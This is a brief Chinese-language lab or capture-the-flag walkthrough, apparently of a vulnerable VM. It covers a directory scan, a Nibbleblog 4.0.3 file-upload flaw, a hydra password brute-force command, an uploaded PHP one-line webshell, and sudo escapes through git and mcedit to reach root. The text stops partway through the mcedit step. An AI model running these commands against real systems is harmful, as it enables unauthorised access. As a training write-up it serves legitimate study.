-
端口
-
访问 80 端口
-
目录扫描
在 /my_weblog 目录下
访问 README
发现是使用 nibbleblog 搭建的,4.0.3版本存在任意文件上传漏洞
需要使用到后台的账号密码
-
账号爆破
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.134 http-post-form "/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect"
-
自动测试失败,手动测试
上传一句话木马
通过 /wp_weblog/content/private/plugins/mu_image/image.php 连接
这里还需要绕过 disable_function
-
执行
sudo -l
使用 git 提权到 admin 用户
sudo -u admin git -p help config !/bin/sh
admin 用户 可以以 root 用户执行 mcedit
使用 mcedit 提权
sudo mcedit
左上角点击 User menu…